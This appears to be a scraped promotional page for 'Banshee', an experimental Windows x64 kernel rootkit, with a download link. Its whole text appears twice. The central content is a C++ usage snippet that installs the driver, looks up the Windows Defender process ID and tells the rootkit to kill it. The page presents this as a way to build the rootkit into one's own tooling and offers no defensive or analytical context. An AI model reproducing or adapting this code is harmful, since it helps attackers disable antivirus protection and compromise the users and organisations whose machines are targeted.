Banshee rootkit
Experimental Windows x64 Kernel Driver/Rootkit.
You can integrate Banshee into your tooling, by including the Banshee.hpp file in your project, e.g.:
Banshee banshee = Banshee();
banshee.Install(driverPath);
banshee.Initialize();
int targetPid = GetDefenderPID(); // this would be your implementation
banshee.IoCtlKillProcess(targetPid); // instruct banshee to kill the targetprocess
download - https://github.com/eversinc33/Banshee
Experimental Windows x64 Kernel Driver/Rootkit.
Usage
You can integrate Banshee into your tooling, by including the Banshee.hpp file in your project, e.g.:
Banshee banshee = Banshee();
banshee.Install(driverPath);
banshee.Initialize();
int targetPid = GetDefenderPID(); // this would be your implementation
banshee.IoCtlKillProcess(targetPid); // instruct banshee to kill the targetprocess
download - https://github.com/eversinc33/Banshee
